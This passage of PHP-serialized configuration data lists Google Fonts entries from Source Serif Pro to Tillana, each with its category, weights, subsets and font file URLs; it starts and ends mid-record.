Pro";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"600";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/sourceserifpro/v4/CeUM4np2c42DV49nanp55YGL0S0YDpKs5GpLtZIQ0m4.ttf";i:600;s:92:"http://fonts.gstatic.com/s/sourceserifpro/v4/yd5lDMt8Sva2PE17yiLarGi4cQnvCGV11m1KlXh97aQ.ttf";i:700;s:92:"http://fonts.gstatic.com/s/sourceserifpro/v4/yd5lDMt8Sva2PE17yiLarEkpYHRvxGNSCrR82n_RDNk.ttf";}s:4:"urls";a:3:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Source+Serif+Pro:regular";i:600;s:60:"https://fonts.googleapis.com/css?family=Source+Serif+Pro:600";i:700;s:60:"https://fonts.googleapis.com/css?family=Source+Serif+Pro:700";}}s:10:"space_mono";a:7:{s:4:"name";s:10:"Space Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/spacemono/v1/B_LOPq3uMVBqC_kmqwURBfesZW2xOQ-xsNqO47m55DA.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/spacemono/v1/7xgIgvUEl9Gvhtf7tXsRzC3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:87:"http://fonts.gstatic.com/s/spacemono/v1/vdpMRWfyjfCvDYTz00NEPAJKKGfqHaYFsRG-T3ceEVo.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/spacemono/v1/y2NWQDXe2-qPj6a6rWkLc0D2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:4:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Space+Mono:regular";s:6:"italic";s:57:"https://fonts.googleapis.com/css?family=Space+Mono:italic";i:700;s:54:"https://fonts.googleapis.com/css?family=Space+Mono:700";s:9:"700italic";s:60:"https://fonts.googleapis.com/css?family=Space+Mono:700italic";}}s:13:"special_elite";a:7:{s:4:"name";s:13:"Special Elite";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/specialelite/v6/9-wW4zu3WNoD5Fjka35Jm4jjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Special+Elite:regular";}}s:10:"spicy_rice";a:7:{s:4:"name";s:10:"Spicy Rice";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/spicyrice/v5/WGCtz7cLoggXARPi9OGD6_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Spicy+Rice:regular";}}s:9:"spinnaker";a:7:{s:4:"name";s:9:"Spinnaker";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/spinnaker/v8/MQdIXivKITpjROUdiN6Jgg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Spinnaker:regular";}}s:6:"spirax";a:7:{s:4:"name";s:6:"Spirax";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/spirax/v5/IOKqhk-Ccl7y31yDsePPkw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Spirax:regular";}}s:10:"squada_one";a:7:{s:4:"name";s:10:"Squada One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/squadaone/v5/3tzGuaJdD65cZVgfQzN8uvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Squada+One:regular";}}s:20:"sree_krushnadevaraya";a:7:{s:4:"name";s:20:"Sree Krushnadevaraya";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/sreekrushnadevaraya/v4/CdsXmnHyEqVl1ahzOh5qnzjDZVem5Eb4d0dXjXa0F_Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Sree+Krushnadevaraya:regular";}}s:8:"sriracha";a:7:{s:4:"name";s:8:"Sriracha";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/sriracha/v1/l-TXHmKwoHm6vtjy4oUz8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Sriracha:regular";}}s:9:"stalemate";a:7:{s:4:"name";s:9:"Stalemate";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/stalemate/v4/wQLCnG0qB6mOu2Wit2dt_w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Stalemate:regular";}}s:13:"stalinist_one";a:7:{s:4:"name";s:13:"Stalinist One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:74:"http://fonts.gstatic.com/s/stalinistone/v8/MQpS-WezM9W4Dd7D3B7I-UT7eZ8.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Stalinist+One:regular";}}s:15:"stardos_stencil";a:7:{s:4:"name";s:15:"Stardos Stencil";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/stardosstencil/v6/ygEOyTW9a6u4fi4OXEZeTFf2eT4jUldwg_9fgfY_tHc.ttf";i:700;s:92:"http://fonts.gstatic.com/s/stardosstencil/v6/h4ExtgvoXhPtv9Ieqd-XC81wDCbBgmIo8UyjIhmkeSM.ttf";}s:4:"urls";a:2:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Stardos+Stencil:regular";i:700;s:59:"https://fonts.googleapis.com/css?family=Stardos+Stencil:700";}}s:21:"stint_ultra_condensed";a:7:{s:4:"name";s:21:"Stint Ultra Condensed";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/stintultracondensed/v5/8DqLK6-YSClFZt3u3EgOUYelbRYnLTTQA1Z5cVLnsI4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:69:"https://fonts.googleapis.com/css?family=Stint+Ultra+Condensed:regular";}}s:20:"stint_ultra_expanded";a:7:{s:4:"name";s:20:"Stint Ultra Expanded";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/stintultraexpanded/v4/FeigX-wDDgHMCKuhekhedQ7dxr0N5HY0cZKknTIL6n4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Stint+Ultra+Expanded:regular";}}s:5:"stoke";a:7:{s:4:"name";s:5:"Stoke";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:3:"300";i:1;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{i:300;s:62:"http://fonts.gstatic.com/s/stoke/v6/Sell9475FOS8jUqQsfFsUQ.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/stoke/v6/A7qJNoqOm2d6o1E6e0yUFg.ttf";}s:4:"urls";a:2:{i:300;s:49:"https://fonts.googleapis.com/css?family=Stoke:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Stoke:regular";}}s:6:"strait";a:7:{s:4:"name";s:6:"Strait";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/strait/v4/m4W73ViNmProETY2ybc-Bg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Strait:regular";}}s:19:"sue_ellen_francisco";a:7:{s:4:"name";s:19:"Sue Ellen Francisco";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/sueellenfrancisco/v7/TwHX4vSxMUnJUdEz1JIgrhzazJzPVbGl8jnf1tisRz4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=Sue+Ellen+Francisco:regular";}}s:8:"suez_one";a:7:{s:4:"name";s:8:"Suez One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"hebrew";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/suezone/v1/xulpHtKbz3V8hoSLE2uKDw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Suez+One:regular";}}s:6:"sumana";a:7:{s:4:"name";s:6:"Sumana";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/sumana/v1/wgdl__wAK7pzliiWs0Nlog.ttf";i:700;s:63:"http://fonts.gstatic.com/s/sumana/v1/8AcM-KAproitONSBBHj3sQ.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Sumana:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Sumana:700";}}s:9:"sunshiney";a:7:{s:4:"name";s:9:"Sunshiney";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/sunshiney/v6/kaWOb4pGbwNijM7CkxK1sQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Sunshiney:regular";}}s:16:"supermercado_one";a:7:{s:4:"name";s:16:"Supermercado One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/supermercadoone/v6/kMGPVTNFiFEp1U274uBMb4mm5hmSKNFf3C5YoMa-lrM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Supermercado+One:regular";}}s:4:"sura";a:7:{s:4:"name";s:4:"Sura";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/sura/v1/jznKrhTH5NezYxb0-Q5zzA.ttf";i:700;s:61:"http://fonts.gstatic.com/s/sura/v1/Z5bXQaFGmoWicN1WlcncxA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Sura:regular";i:700;s:48:"https://fonts.googleapis.com/css?family=Sura:700";}}s:7:"suranna";a:7:{s:4:"name";s:7:"Suranna";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/suranna/v4/PYmfr6TQeTqZ-r8HnPM-kA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Suranna:regular";}}s:9:"suravaram";a:7:{s:4:"name";s:9:"Suravaram";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/suravaram/v3/G4dPee4pel_w2HqzavW4MA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Suravaram:regular";}}s:11:"suwannaphum";a:7:{s:4:"name";s:11:"Suwannaphum";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/suwannaphum/v9/1jIPOyXied3T79GCnSlCN6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Suwannaphum:regular";}}s:18:"swanky_and_moo_moo";a:7:{s:4:"name";s:18:"Swanky and Moo Moo";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/swankyandmoomoo/v6/orVNZ9kDeE3lWp3U3YELu9DVLKqNC3_XMNHhr8S94FU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Swanky+and+Moo+Moo:regular";}}s:9:"syncopate";a:7:{s:4:"name";s:9:"Syncopate";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/syncopate/v7/RQVwO52fAH6MI764EcaYtw.ttf";i:700;s:87:"http://fonts.gstatic.com/s/syncopate/v7/S5z8ixiOoC4WJ1im6jAlYC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Syncopate:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Syncopate:700";}}s:9:"tangerine";a:7:{s:4:"name";s:9:"Tangerine";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/tangerine/v7/DTPeM3IROhnkz7aYG2a9sA.ttf";i:700;s:87:"http://fonts.gstatic.com/s/tangerine/v7/UkFsr-RwJB_d2l9fIWsx3i3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Tangerine:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Tangerine:700";}}s:6:"taprom";a:7:{s:4:"name";s:6:"Taprom";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/taprom/v8/-KByU3BaUsyIvQs79qFObg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Taprom:regular";}}s:5:"tauri";a:7:{s:4:"name";s:5:"Tauri";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/tauri/v4/XIWeYJDXNqiVNej0zEqtGg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Tauri:regular";}}s:7:"taviraj";a:7:{s:4:"name";s:7:"Taviraj";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:64:"http://fonts.gstatic.com/s/taviraj/v1/7iDtujKEc7hwcT6D0zLx-A.ttf";s:9:"100italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/ai0UdHXB1gi5etfpU0CZ6aCWcynf_cDxXwCLxiixG1c.ttf";i:200;s:85:"http://fonts.gstatic.com/s/taviraj/v1/fn3qCO_sC_zLuf2hqWE37fesZW2xOQ-xsNqO47m55DA.ttf";s:9:"200italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/eDMMTK5GhTdvvz3R-ZWvay3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:85:"http://fonts.gstatic.com/s/taviraj/v1/1EIpbtG_cs5haG6Ba9wX8vesZW2xOQ-xsNqO47m55DA.ttf";s:9:"300italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/IEBfc1xGgsBbdCeXKNAtfS3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/taviraj/v1/AH1eoWagKJhbVx4Poc3M1A.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/taviraj/v1/hAS5RxygdSnG4626KdkXuQ.ttf";i:500;s:85:"http://fonts.gstatic.com/s/taviraj/v1/s8BuqYm5ebG2N1R4JkTp_fesZW2xOQ-xsNqO47m55DA.ttf";s:9:"500italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/319qfe3yzAi9RNFu-dI9zy3USBnSvpkopQaUR-2r7iU.ttf";i:600;s:85:"http://fonts.gstatic.com/s/taviraj/v1/KscmiA6HGz7nCcHhaddQH_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"600italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/ofRN6EMiboGiM2Ga3cG_yy3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:85:"http://fonts.gstatic.com/s/taviraj/v1/TY91892tTFNYCeCXjQ1AEPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/4Yzb6i1xtMRZn9oAQ484nS3USBnSvpkopQaUR-2r7iU.ttf";i:800;s:85:"http://fonts.gstatic.com/s/taviraj/v1/oGWJbiDGcxlInLLnrLxTDvesZW2xOQ-xsNqO47m55DA.ttf";s:9:"800italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/MPtY5Qs3hwV4f0LUH-vVmy3USBnSvpkopQaUR-2r7iU.ttf";i:900;s:85:"http://fonts.gstatic.com/s/taviraj/v1/RfIEodnN0NYWUdZHol5fdPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"900italic";s:85:"http://fonts.gstatic.com/s/taviraj/v1/aDM2JaXSd_qo0nqKiBAq5C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:18:{i:100;s:51:"https://fonts.googleapis.com/css?family=Taviraj:100";s:9:"100italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:100italic";i:200;s:51:"https://fonts.googleapis.com/css?family=Taviraj:200";s:9:"200italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:200italic";i:300;s:51:"https://fonts.googleapis.com/css?family=Taviraj:300";s:9:"300italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:300italic";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Taviraj:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Taviraj:italic";i:500;s:51:"https://fonts.googleapis.com/css?family=Taviraj:500";s:9:"500italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:500italic";i:600;s:51:"https://fonts.googleapis.com/css?family=Taviraj:600";s:9:"600italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:600italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Taviraj:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:700italic";i:800;s:51:"https://fonts.googleapis.com/css?family=Taviraj:800";s:9:"800italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:800italic";i:900;s:51:"https://fonts.googleapis.com/css?family=Taviraj:900";s:9:"900italic";s:57:"https://fonts.googleapis.com/css?family=Taviraj:900italic";}}s:4:"teko";a:7:{s:4:"name";s:4:"Teko";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:61:"http://fonts.gstatic.com/s/teko/v5/OobFGE9eo24rcBpN6zXDaQ.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/teko/v5/UtekqODEqZXSN2L-njejpA.ttf";i:500;s:61:"http://fonts.gstatic.com/s/teko/v5/FQ0duU7gWM4cSaImOfAjBA.ttf";i:600;s:61:"http://fonts.gstatic.com/s/teko/v5/QDx_i8H-TZ1IK1JEVrqwEQ.ttf";i:700;s:61:"http://fonts.gstatic.com/s/teko/v5/xKfTxe_SWpH4xU75vmvylA.ttf";}s:4:"urls";a:5:{i:300;s:48:"https://fonts.googleapis.com/css?family=Teko:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Teko:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Teko:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Teko:600";i:700;s:48:"https://fonts.googleapis.com/css?family=Teko:700";}}s:5:"telex";a:7:{s:4:"name";s:5:"Telex";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/telex/v4/24-3xP9ywYeHOcFU3iGk8A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Telex:regular";}}s:18:"tenali_ramakrishna";a:7:{s:4:"name";s:18:"Tenali Ramakrishna";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/tenaliramakrishna/v3/M0nTmDqv2M7AGoGh-c946BZak5pSBHqWX6uyVMiMFoA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Tenali+Ramakrishna:regular";}}s:10:"tenor_sans";a:7:{s:4:"name";s:10:"Tenor Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/tenorsans/v7/dUBulmjNJJInvK5vL7O9yfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Tenor+Sans:regular";}}s:11:"text_me_one";a:7:{s:4:"name";s:11:"Text Me One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/textmeone/v4/9em_3ckd_P5PQkP4aDyDLqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Text+Me+One:regular";}}s:18:"the_girl_next_door";a:7:{s:4:"name";s:18:"The Girl Next Door";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/thegirlnextdoor/v7/cWRA4JVGeEcHGcPl5hmX7kzo0nFFoM60ux_D9BUymX4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=The+Girl+Next+Door:regular";}}s:6:"tienne";a:7:{s:4:"name";s:6:"Tienne";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"700";i:2;s:3:"900";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/tienne/v8/-IIfDl701C0z7-fy2kmGvA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/tienne/v8/JvoCDOlyOSEyYGRwCyfs3g.ttf";i:900;s:63:"http://fonts.gstatic.com/s/tienne/v8/FBano5T521OWexj2iRYLMw.ttf";}s:4:"urls";a:3:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Tienne:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Tienne:700";i:900;s:50:"https://fonts.googleapis.com/css?family=Tienne:900";}}s:7:"tillana";a:7:{s:4:"name";s:7:"Tillana";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";i:4;s:3:"800";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/tillana/v1/zN0D-jDPsr1HzU3VRFLY5g.ttf";i:500;s:85:"http://fonts.gstatic.com/s/tillana/v1/gqdUngSIcY9tSla5eCZky_esZW2xOQ-xsNqO47m55DA.ttf";i:600;s:85:"http://fonts.gstatic.com/s/tillana/v1/fqon6-r15hy8M1cyiYfQBvesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/tillana/v1/jGARMTxLrMerzTCpGBpMffesZW2xOQ-xsNqO47m55DA.ttf";i:800;s:85:"http://fonts.gstat